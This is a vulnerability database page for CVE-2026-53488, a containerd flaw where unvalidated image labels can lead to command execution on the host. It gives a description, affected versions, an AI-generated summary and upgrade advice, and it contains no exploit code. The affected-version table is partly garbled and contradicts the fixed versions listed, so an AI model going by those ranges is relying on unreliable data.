CVE-2026-53488
Received Received - Intake

BaseFortify

Vulnerability report for CVE-2026-53488, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-01

Last updated on: 2026-07-01

Assigner: GitHub, Inc.

Description

containerd is an open-source container runtime. In versions prior to 1.7.33, 2.3.2, 2.2.5, 2.1.9, and 2.0.10 the CRI plugin propagates labels from an image config (LABEL instruction in Dockerfile) to a container without validation. This may result in executing an arbitrary command on the host, via a plugin that consumes container labels for some operations. This issue has been fixed in versions 1.7.33, 2.3.2, 2.2.5, 2.1.9, and 2.0.10.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-01
Last Modified
2026-07-01
Generated
2026-07-01
AI Q&A
2026-07-01
EPSS Evaluated
N/A
NVD
EUVD

Affected Vendors & Products

Showing 5 associated CPEs
Vendor Product Version / Range
containerd containerd to 1.7.33 (exc)
containerd containerd to 2.0.10 (exc)
containerd containerd From 2.1.9 (inc) to 2.2.5 (exc)
containerd containerd From 2.2.5 (inc) to 2.3.2 (exc)
containerd containerd From 2.3.2 (inc) to 2.3.2 (exc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-20 The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2026-53488 is a critical vulnerability in containerd, an open-source container runtime. The issue occurs because the CRI plugin propagates labels from an image configuration (specified by the LABEL instruction in a Dockerfile) to a container without validating them. This lack of validation can allow an attacker to execute arbitrary commands on the host system if a plugin processes these container labels for certain operations.

Impact Analysis

This vulnerability can have a severe impact as it allows an attacker to execute arbitrary commands on the host system running containerd. This could lead to unauthorized access, control over the host, potential data breaches, and disruption of services. The risk is especially high if untrusted container images are used, as malicious labels could be crafted to exploit this flaw.

Mitigation Strategies

To mitigate this vulnerability, users should immediately update containerd to the fixed versions: 1.7.33, 2.0.10, 2.1.9, 2.2.5, or 2.3.2.

As a temporary measure before updating, only trusted container images should be used to reduce the risk of exploitation.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-53488. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart